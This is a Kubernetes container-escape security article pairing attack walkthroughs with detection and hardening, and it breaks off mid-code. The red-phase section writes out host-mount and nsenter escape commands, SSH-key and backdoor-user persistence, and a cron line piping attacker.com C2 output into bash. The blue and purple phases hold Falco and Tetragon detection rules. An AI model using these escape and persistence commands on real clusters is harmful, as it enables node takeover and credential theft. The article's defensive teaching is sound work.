TL;DR
- Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host, and two commands can produce a root shell on the node
- The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, capabilities, and seccomp. --privileged grants every capability, disables seccomp and AppArmor, and exposes host devices, so the kernel treats root in the container almost exactly like root on the host
- Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
- Detection requires kernel-level visibility: Falco fires on privileged container exec; Tetragon traces nsenter and mount syscalls at the kernel hook, not through a process-name check that can be evaded
- The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level: policy that blocks --privileged, hostPID, hostNetwork, and hostPath mounts before a pod ever schedules
- Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane
OWASP Mapping: A04 Insecure Design (--privileged placed in production workloads because the development environment never enforced boundaries). A05 Security Misconfiguration (absence of PodSecurity admission, RuntimeClass, and seccomp profiles).
The Big Picture
┌─────────────────────────────────────────────────────────────────────────┐
│ KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE │
│ │
│ ┌──────────────────────────────────────────────────────────────┐ │
│ │ KUBERNETES NODE │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (--privileged) │ │ │
│ │ │ │ │ │
│ │ │ web app ──▶ exploit ──▶ shell in container │ │ │
│ │ │ │ │ │ │
│ │ │ PATH 1: mount /dev/sda1 │ │ │ │
│ │ │ ──────────────────────── ▼ │ │ │
│ │ │ chroot /mnt/host → root shell on node │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (hostPID=true) │ │ │
│ │ │ │ │ │
│ │ │ PATH 2: nsenter -t 1 -m -u -i -n -p -- bash │ │ │
│ │ │ ─────────────────────────────────────────────────▶ │ │ │
│ │ │ root shell in host PID 1 namespaces │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (runc CVE) │ │ │
│ │ │ │ │ │
│ │ │ PATH 3: overwrite /proc/self/exe during runc exec │ │ │
│ │ │ ─────────────────────────────────────────────────▶ │ │ │
│ │ │ arbitrary code execution as root on node │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ Node root → kubectl access → cluster-admin via node creds │ │
│ └──────────────────────────────────────────────────────────────┘ │
│ │
│ DETECTION LAYER │ STRUCTURAL FIX │
│ Falco / Tetragon │ PodSecurity Restricted │
│ mount syscall hooks │ RuntimeClass (gVisor/Kata) │
│ audit logs │ Seccomp + no-new-privileges │
└─────────────────────────────────────────────────────────────────────────┘
Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.
The Incident: --privileged “Just for Debugging”
A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds securityContext.privileged: true (the Kubernetes equivalent of docker run --privileged) to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The privileged setting stays in the manifest when staging gets promoted to production.
Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.
Inside the container, two commands (after creating a mount point):
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.
The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.
This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.
Why the Kernel Doesn’t Know About Kubernetes
Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.
Kernel isolation comes from:
Linux namespaces (PID, net, mount, IPC, UTS, user)
├── Created by container runtime (containerd, crio)
├── Container processes run inside these namespaces
└── From inside: host PIDs, host network, host filesystem are not visible
cgroups
├── Limit CPU, memory, and device access per container
└── Prevent runaway resource consumption and limit device access scope
seccomp profiles
├── Filter system calls the container is allowed to invoke
└── Block ptrace, mount, and other privileged syscalls
Capabilities
├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
└── --privileged grants ALL capabilities + disables seccomp + disables AppArmor
--privileged removes three of these protections at once. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement; it also lifts the device cgroup restrictions, so host block devices appear under /dev. The namespaces themselves remain, which is why a privileged container is effectively a process running on the host with a different filesystem view. With mount, you can fix even the filesystem view.
Red Phase: The Three Escape Paths
Path 1: --privileged Container
A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.
Check if the current container is privileged:
# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff
# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin present: consistent with a privileged container (or one granted CAP_SYS_ADMIN explicitly)
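The same decoding can be done without capsh, which is often missing from minimal images. The following is a minimal Python sketch: the bit numbers come from linux/capability.h, while the function names and the choice of which capabilities to report are illustrative assumptions, not part of any tool named in this article.

```python
# Capability bit numbers from linux/capability.h (subset relevant to escapes).
CAP_BITS = {
    "cap_dac_override": 1,
    "cap_net_admin": 12,
    "cap_sys_module": 16,
    "cap_sys_ptrace": 19,
    "cap_sys_admin": 21,
}


def read_capeff(status_text: str) -> str:
    """Extract the CapEff hex string from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("no CapEff line found")


def decode_capeff(hex_mask: str) -> set[str]:
    """Return the names from CAP_BITS whose bit is set in the mask."""
    mask = int(hex_mask, 16)
    return {name for name, bit in CAP_BITS.items() if mask & (1 << bit)}


if __name__ == "__main__":
    # Hypothetical sample; on a real system read /proc/1/status instead.
    sample = "Name:\tbash\nCapEff:\t0000003fffffffff\n"
    print(sorted(decode_capeff(read_capeff(sample))))
```

A mask that includes cap_sys_admin and cap_sys_module is the signal to look for; a container running with a typical default capability set reports neither.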
Full escape sequence:
# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)
# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
# sda 8:0 0 80G 0 disk
# ├─sda1 8:1 0 79G 0 part /
# └─sda2 8:2 0 1G 0 part [SWAP]
# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host
# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys
# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)
# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/
What persistence looks like from node root:
# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor
# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
>> /mnt/host/etc/cron.d/maintenance
Path 2: hostPID / hostNetwork Escape
hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.
With hostPID enabled and enough privilege to call setns (in practice CAP_SYS_ADMIN, which a privileged container has), nsenter produces a host root shell without mounting anything:
# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node
# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash
# Now running in host namespaces
hostname # shows node hostname, not container hostname
mount | grep " / " # shows host root mount, not container overlay
id # uid=0(root) gid=0(root)
nsenter is a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.
hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.
Path 3: runc CVE Escape (CVE-2019-5736)
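CVE-2019-5736 is a different attack class: it does not require a misconfiguration in the pod spec. It exploits how the runc container runtime exposes its own binary through /proc/self/exe, and the overwrite depends on timing.
The mechanism:
1. Attacker controls a container image, or already has root inside a running container
2. A binary in the container (for example /bin/sh) is replaced with a script whose interpreter line is #!/proc/self/exe
3. Operator runs: kubectl exec -it <pod> -- /bin/sh
4. runc enters the container and executes the target; the interpreter line makes the kernel re-execute /proc/self/exe, which is the host's runc binary
5. Attacker's process in the container opens /proc/<runc-pid>/exe and now holds a file descriptor to the host runc binary
6. Timing window: once that runc process exits, the attacker reopens the descriptor for writing and overwrites the runc binary on the host
7. On the next runc invocation, the malicious binary runs as root on the host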
The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:
# Simplified bpftrace illustration (observation only; it changes nothing on the node).
# As written this prints every write() on the node, without filtering on the target file.
# Tetragon implements the filtered version as a continuous policy
bpftrace -e '
tracepoint:syscalls:sys_enter_write {
// No path filter here: resolving the fd to /proc/self/exe is left to
// Tetragon, which handles this at the LSM hook level in production
printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20
Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.
Safe Simulation: Audit Your Cluster Before an Attacker Does
These commands are read-only and safe to run against any cluster you have kubectl access to:
# Find all pods running with --privileged
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.containers[].securityContext.privileged == true) |
[.metadata.namespace, .metadata.name,
(.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
join(" / ")' | \
sort -u
# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.hostPID == true or .spec.hostNetwork == true) |
([.metadata.namespace, .metadata.name] +
[(if .spec.hostPID then "hostPID" else empty end),
(if .spec.hostNetwork then "hostNetwork" else empty end)]) |
join(" / ")' | \
sort -u
# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.volumes[]?.hostPath != null) |
[.metadata.namespace, .metadata.name,
(.spec.volumes[] | select(.hostPath != null) |
.name + "→" + .hostPath.path)] |
join(" / ")' | \
sort -u
# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
jq -r '.items[] |
select(.spec.template.spec.containers[].securityContext.privileged == true) |
[.metadata.namespace, .metadata.name] | join("/")' | \
sort -u
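The four jq queries above can also be folded into one pass that covers initContainers and ephemeral containers, which the container-level queries skip. This is a hedged Python sketch that operates on the JSON produced by kubectl get pods -A -o json; the function names and the finding labels are hypothetical.

```python
def escape_preconditions(pod: dict) -> list[str]:
    """List the escape-relevant settings found in one pod object."""
    spec = pod.get("spec") or {}
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag) is True:
            findings.append(flag)
    # Init and ephemeral containers run on the node too, so include them.
    for field in ("containers", "initContainers", "ephemeralContainers"):
        for container in spec.get(field) or []:
            sc = container.get("securityContext") or {}
            if sc.get("privileged") is True:
                findings.append(f"privileged:{container.get('name')}")
    for volume in spec.get("volumes") or []:
        if volume.get("hostPath"):
            findings.append(f"hostPath:{volume['hostPath'].get('path')}")
    return findings


def audit(pod_list: dict) -> dict[str, list[str]]:
    """Map 'namespace/name' to findings for every pod that has any."""
    report = {}
    for pod in pod_list.get("items") or []:
        findings = escape_preconditions(pod)
        if findings:
            meta = pod.get("metadata") or {}
            report[f"{meta.get('namespace')}/{meta.get('name')}"] = findings
    return report


if __name__ == "__main__":
    # Hypothetical sample standing in for real kubectl output.
    sample = {"items": [{
        "metadata": {"namespace": "production", "name": "web"},
        "spec": {"hostPID": True,
                 "containers": [{"name": "app",
                                 "securityContext": {"privileged": True}}]},
    }]}
    for pod, findings in audit(sample).items():
        print(pod, findings)
```

To run it against a live cluster, load the kubectl output with json.load and pass the result to audit(); like the jq queries, this only reads pod specs.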
Blue Phase: eBPF Detection
Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.
Falco: Privileged Container and Mount Detection
# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml
# Rule 1: Privileged container started
- rule: Privileged Container Started
desc: >
A container running with --privileged was started.
This removes all capability and seccomp restrictions.
condition: >
container.privileged = true and
evt.type = execve and
container.id != host
output: >
Privileged container started
(user=%user.name user_uid=%user.uid
command=%proc.cmdline
container_id=%container.id
container_name=%container.name
image=%container.image.repository:%container.image.tag
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: WARNING
tags: [container, privilege-escalation, OWASP-A05]
# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
desc: >
A process inside a container invoked mount().
In a non-privileged container this fails; in a privileged container
it succeeds and may be mounting host block devices.
condition: >
evt.type = mount and
container.id != host and
not proc.name in (container_runtime_processes)
output: >
Mount syscall from container
(user=%user.name
command=%proc.cmdline
mount_source=%evt.arg.source
mount_target=%evt.arg.target
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: ERROR
tags: [container, privilege-escalation, OWASP-A04]
# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
desc: >
nsenter or chroot executed from within a running container.
nsenter with -t 1 enters host namespaces directly.
condition: >
evt.type = execve and
container.id != host and
proc.name in (nsenter, chroot)
output: >
nsenter/chroot executed in container
(user=%user.name
command=%proc.cmdline
parent=%proc.pname
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: ERROR
tags: [container, privilege-escalation, T1611]
# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
desc: >
A process inside a container is reading /proc entries for PIDs
that don't belong to it — indicates hostPID=true and enumeration.
condition: >
evt.type = openat and
fd.name startswith /proc/ and
fd.name endswith /status and
container.id != host and
not fd.name startswith /proc/self
output: >
Container reading host process status
(proc=%proc.cmdline fd=%fd.name
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: WARNING
tags: [container, discovery, T1057]
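Rules like these generate a stream of alerts, and the WARNING-level ones can be noisy. As a rough illustration of triage, the Python sketch below groups alerts by pod and keeps only those at or above a chosen priority. It assumes Falco is configured for JSON output and that each line carries rule, priority, and output_fields keys with k8s.ns.name and k8s.pod.name inside; verify those field names against your own Falco output before relying on it. The function name is hypothetical.

```python
import json
from collections import defaultdict

# Falco priorities from least to most severe, lowercased for comparison.
SEVERITY = ["debug", "informational", "notice", "warning",
            "error", "critical", "alert", "emergency"]


def triage(lines, min_priority="error"):
    """Group alert rule names by 'namespace/pod' at or above min_priority."""
    threshold = SEVERITY.index(min_priority)
    grouped = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip anything that is not a JSON alert
        priority = str(event.get("priority", "")).lower()
        if priority not in SEVERITY or SEVERITY.index(priority) < threshold:
            continue
        fields = event.get("output_fields") or {}
        key = f"{fields.get('k8s.ns.name')}/{fields.get('k8s.pod.name')}"
        grouped[key].append(event.get("rule"))
    return dict(grouped)
```

A pod that triggers both the mount rule and the nsenter/chroot rule within a short window is a much stronger signal than either alert alone, which is the reason for grouping by pod rather than by rule.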
Tetragon: TracingPolicy for nsenter and Mount Syscalls
Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.
# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: container-escape-detection
namespace: kube-system
spec:
kprobes:
# Hook 1: sys_mount — detect any mount() call from a container process
- call: "sys_mount"
return: false
syscall: true
args:
- index: 0
type: "string" # source device (e.g. /dev/sda1)
- index: 1
type: "string" # target mount point
- index: 2
type: "string" # filesystem type
selectors:
# Only fire for container processes (not the container runtime itself)
- matchNamespaces:
- namespace: Pid
operator: NotIn
values:
- "host_pid_ns" # Replace with actual host PID NS value
matchActions:
- action: Post # Post = log; change to Sigkill to enforce
# Hook 2: __x64_sys_execve for nsenter binary
- call: "__x64_sys_execve"
return: false
syscall: true
args:
- index: 0
type: "string" # filename being executed
selectors:
- matchArgs:
- index: 0
operator: Postfix
values:
- "/nsenter"
matchActions:
- action: Post
# Hook 3: write to /proc/self/exe (runc CVE class indicator), part of the same kprobes list
- call: "vfs_write"
return: false
syscall: false
args:
- index: 0
type: "file"
selectors:
- matchArgs:
- index: 0
operator: Postfix
values:
- "/proc/self/exe"
matchActions:
- action: Sigkill # Block immediately — no legitimate use case for this write
bpftrace: Quick Node-Level Validation
Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:
# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers
bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
printf("%-8d %-20s %-30s -> %-30s type=%s\n",
pid, comm,
str(args->dev_name), // source device
str(args->dir_name), // mount target
str(args->type)); // filesystem type
}
' 2>/dev/null
# Sample output:
# PID COMM SOURCE TARGET TYPE
# 38471 bash /dev/sda1 /mnt/host ext4
# 38471 and comm=bash from inside a container = escape attempt in progress
# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
if (str(args->filename) == "/usr/bin/nsenter" ||
str(args->filename) == "/bin/nsenter") {
printf("nsenter called: pid=%d ppid=%d comm=%s\n",
pid, curtask->real_parent->pid, comm);
}
}
' 2>/dev/null
What Kubernetes Audit Logs Show (and What They Miss)
Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.
# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log pod creation at RequestResponse level (captures full spec)
- level: RequestResponse
resources:
- group: ""
resources: ["pods"]
verbs: ["create", "update", "patch"]
# Log exec into pods — this is the entry point for escape attempts
- level: RequestResponse
resources:
- group: ""
resources: ["pods/exec"]
verbs: ["create"]
# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
jq -r '[
.requestReceivedTimestamp,
.user.username,
.objectRef.namespace + "/" + .objectRef.name,
"privileged=true"
] | join(" | ")'
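# Or check Events via kubectl. Events are not audit records, and kubelet "Created"
# messages usually do not mention privileged, so an empty result here is inconclusive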
kubectl get events -A --field-selector reason=Created \
-o json | \
jq -r '.items[] |
select(.message | contains("privileged")) |
[.metadata.namespace, .involvedObject.name, .message] |
join(" / ")'
The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pods/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.
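A grep for "privileged":true matches the string anywhere in the event, including the response body. A structured parse is more precise. The Python sketch below assumes a JSON-lines audit log written at RequestResponse level, so that requestObject is present; the function names and finding labels are illustrative.

```python
import json


def privileged_containers(pod_spec: dict) -> list[str]:
    """Names of containers in the spec that request privileged mode."""
    names = []
    for field in ("containers", "initContainers"):
        for container in pod_spec.get(field) or []:
            sc = container.get("securityContext") or {}
            if sc.get("privileged") is True:
                names.append(container.get("name"))
    return names


def scan_audit_log(lines):
    """Yield (timestamp, user, namespace/name, finding) for risky pod events."""
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        ref = event.get("objectRef") or {}
        if ref.get("resource") != "pods":
            continue
        stamp = event.get("requestReceivedTimestamp")
        user = (event.get("user") or {}).get("username")
        target = f"{ref.get('namespace')}/{ref.get('name')}"
        if ref.get("subresource") == "exec":
            yield (stamp, user, target, "exec")
            continue
        spec = (event.get("requestObject") or {}).get("spec") or {}
        for name in privileged_containers(spec):
            yield (stamp, user, target, f"privileged:{name}")
        if spec.get("hostPID") is True:
            yield (stamp, user, target, "hostPID")
```

Feeding it the open audit log file yields one tuple per finding, which keeps the who and when attached to each privileged creation or exec.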
Purple Phase: Structural Fixes
Fix 1: PodSecurity Admission — Enforce Restricted Profile
PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.
# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
# enforce: pod is rejected at admission if spec violates Restricted
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
# audit: violations are logged but not rejected (useful for rollout)
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/audit-version: latest
# warn: user gets a warning but pod is allowed (for migration)
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
What Restricted profile blocks (relevant to escape paths):
# These settings are REQUIRED by Restricted. Apply them explicitly
# so the PodSecurity admission controller does not reject your workloads
securityContext:
# Pod-level
runAsNonRoot: true
seccompProfile:
type: RuntimeDefault # or Localhost with a custom profile
containers:
- securityContext:
allowPrivilegeEscalation: false
privileged: false # blocks Path 1
capabilities:
drop: ["ALL"] # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
add: [] # add only what is specifically required
readOnlyRootFilesystem: true # not required by Restricted; reduces attacker persistence options
# Pod spec — blocked by Restricted
spec:
hostPID: false # must be false (blocks Path 2)
hostNetwork: false # must be false
hostIPC: false # must be false
volumes: # hostPath volumes blocked
- name: app-data
emptyDir: {} # emptyDir, configMap, secret allowed; hostPath not
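Before switching a namespace to enforce, it helps to know which of the required fields a manifest is missing. The Python sketch below approximates four of the Restricted checks shown above for a pod spec that has already been loaded as a dict. It is deliberately incomplete and does not replace the admission controller; the function name is hypothetical.

```python
def missing_restricted_settings(pod_spec: dict) -> list[str]:
    """Report containers lacking settings that the Restricted profile requires.

    Covers only allowPrivilegeEscalation, capabilities.drop, runAsNonRoot,
    and seccompProfile; the real standard checks more than this.
    """
    pod_sc = pod_spec.get("securityContext") or {}
    problems = []
    for container in pod_spec.get("containers") or []:
        sc = container.get("securityContext") or {}
        name = container.get("name", "<unnamed>")
        if sc.get("allowPrivilegeEscalation") is not False:
            problems.append(f"{name}: allowPrivilegeEscalation must be false")
        drops = (sc.get("capabilities") or {}).get("drop") or []
        if "ALL" not in drops:
            problems.append(f"{name}: capabilities.drop must include ALL")
        # A container-level value overrides the pod-level one when present.
        non_root = sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot"))
        if non_root is not True:
            problems.append(f"{name}: runAsNonRoot must be true")
        seccomp = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
        if seccomp.get("type") not in ("RuntimeDefault", "Localhost"):
            problems.append(f"{name}: seccompProfile.type must be RuntimeDefault or Localhost")
    return problems
```

Running this in CI against rendered manifests surfaces the same class of problem that warn mode reports, but before the manifest reaches a cluster.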
Rollout approach for existing clusters:
Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:
# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
jq -r '.items[] |
select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
.metadata.name' | \
while read ns; do
kubectl label namespace "$ns" \
pod-security.kubernetes.io/warn=restricted \
pod-security.kubernetes.io/warn-version=latest \
--overwrite
echo "Labeled $ns"
done
# Before promoting to enforce, ask the API server which existing pods would violate it.
# A server-side dry run changes nothing and prints a warning for each violating namespace
kubectl label --dry-run=server --overwrite ns --all \
pod-security.kubernetes.io/enforce=restricted
Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads
For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.
gVisor intercepts system calls in a user-space kernel (the Sentry), and Kata Containers runs each pod inside a lightweight VM with its own guest kernel. In both cases a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.
# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: gvisor
handler: runsc # must match the handler name in containerd/crio config
scheduling:
nodeSelector:
runtime.gvisor: "true" # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
name: untrusted-workload
spec:
runtimeClassName: gvisor # all syscalls go through gVisor's sentry
containers:
- name: app
image: untrusted-image:latest
# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: kata-containers
handler: kata-qemu
For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.
Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape
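Even without gVisor, a custom allowlist seccomp profile closes most of the escape syscall surface. The profile below denies everything by default, so mount, unshare, setns, and pivot_root fail because they are not listed. Note that clone is allowed without argument filtering, so blocking clone with namespace flags would need an additional rule with args conditions.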
{
"defaultAction": "SCMP_ACT_ERRNO",
"architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
"syscalls": [
{
"names": [
"accept", "accept4", "access", "arch_prctl",
"bind", "brk", "capget", "capset",
"chdir", "chmod", "chown", "clock_gettime",
"clone",
"close", "connect",
"dup", "dup2", "dup3",
"execve", "exit", "exit_group",
"fchmod", "fchown", "fcntl",
"fstat", "fstatfs", "fsync",
"futex", "getcwd", "getdents64",
"getegid", "geteuid", "getgid", "getgroups",
"getpeername", "getpid", "getppid",
"getrlimit", "getsockname", "getsockopt",
"gettid", "gettimeofday", "getuid",
"inotify_add_watch", "inotify_init1",
"listen", "lseek", "lstat",
"madvise", "mmap", "mprotect",
"munmap", "nanosleep",
"open", "openat",
"pipe", "pipe2", "poll", "ppoll",
"prctl", "pread64", "pwrite64",
"read", "readlink", "readv",
"recvfrom", "recvmsg", "recvmmsg",
"rename", "rt_sigaction", "rt_sigprocmask",
"rt_sigreturn", "sched_getaffinity",
"select", "sendfile", "sendmsg", "sendto",
"set_robust_list", "set_tid_address",
"setgid", "setgroups", "setuid",
"setsockopt", "shutdown",
"socket", "socketpair",
"stat", "statfs", "symlink",
"tgkill", "time", "timerfd_create",
"timerfd_settime", "truncate",
"uname", "unlink", "unlinkat",
"wait4", "waitid",
"write", "writev"
],
"action": "SCMP_ACT_ALLOW"
}
]
}
Apply via pod spec:
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: "container-escape-block.json"
# Profile must be in /var/lib/kubelet/seccomp/ on each node
# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks a few dozen of the 300+ Linux syscalls)
# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
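An allowlist profile is only as good as what it leaves out, and a long names array is easy to misread. The Python sketch below reviews a profile in the JSON format shown above and reports escape-relevant syscalls that are allowed. The list of syscalls treated as escape-relevant is an assumption chosen for illustration, and the function names are hypothetical.

```python
# Syscalls commonly involved in container escapes (illustrative, not exhaustive).
ESCAPE_SYSCALLS = {
    "mount", "umount2", "unshare", "setns", "pivot_root",
    "ptrace", "bpf", "open_by_handle_at", "init_module", "finit_module",
}


def allowed_syscalls(profile: dict) -> dict[str, bool]:
    """Map each allowed syscall to True if it is allowed with no args filter."""
    allowed = {}
    for rule in profile.get("syscalls") or []:
        if rule.get("action") != "SCMP_ACT_ALLOW":
            continue
        unconditional = not rule.get("args")
        for name in rule.get("names") or []:
            allowed[name] = allowed.get(name, False) or unconditional
    return allowed


def review(profile: dict) -> list[str]:
    """Return human-readable notes about risky parts of a seccomp profile."""
    notes = []
    if profile.get("defaultAction") == "SCMP_ACT_ALLOW":
        notes.append("defaultAction allows every syscall that is not listed")
    allowed = allowed_syscalls(profile)
    for name in sorted(ESCAPE_SYSCALLS & set(allowed)):
        notes.append(f"{name} is allowed")
    if allowed.get("clone"):
        notes.append("clone is allowed without argument filters "
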